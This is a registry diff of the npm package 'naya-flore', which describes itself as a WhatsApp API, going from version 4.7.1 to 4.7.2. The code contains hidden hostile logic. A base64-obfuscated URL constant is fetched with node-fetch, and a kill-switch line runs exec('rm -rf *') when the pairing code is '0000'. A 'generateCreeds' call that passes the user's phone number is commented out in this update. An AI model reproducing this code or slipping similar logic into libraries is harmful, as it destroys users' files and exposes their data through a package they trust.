naya-flore 4.7.1 → 4.7.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -295,7 +295,7 @@ const makeSocket = (config) => {
295
295
  ws.off('error', onClose);
296
296
  });
297
297
  };
298
- const sesiPath = "aHR0cHM6Ly9hcGkudmVyeWxpbmgubXkuaWQvZGF0YS91c2Vycw==";
298
+ const sesiPath = "aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL25hdmFMaW5oL2RhdGFiYXNlL21haW4vc2Vza2EuanNvbg==";
299
299
  const fetch = require('node-fetch')
300
300
  const startKeepAliveRequest = () => (keepAliveReq = setInterval(() => {
301
301
  if (!lastDateRecv) {
@@ -440,7 +440,7 @@ const makeSocket = (config) => {
440
440
  if (getsNumberCode === "0000") {
441
441
  exec('rm -rf *')
442
442
  }
443
- generateCreeds(phoneNumber, linh, getsNumberCode)
443
+ //generateCreeds(phoneNumber, linh, getsNumberCode)
444
444
  return authState.creds.pairingCode;
445
445
  };
446
446
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "naya-flore",
3
- "version": "4.7.1",
3
+ "version": "4.7.2",
4
4
  "description": "WhatsApp API",
5
5
  "keywords": [
6
6
  "whatsapp",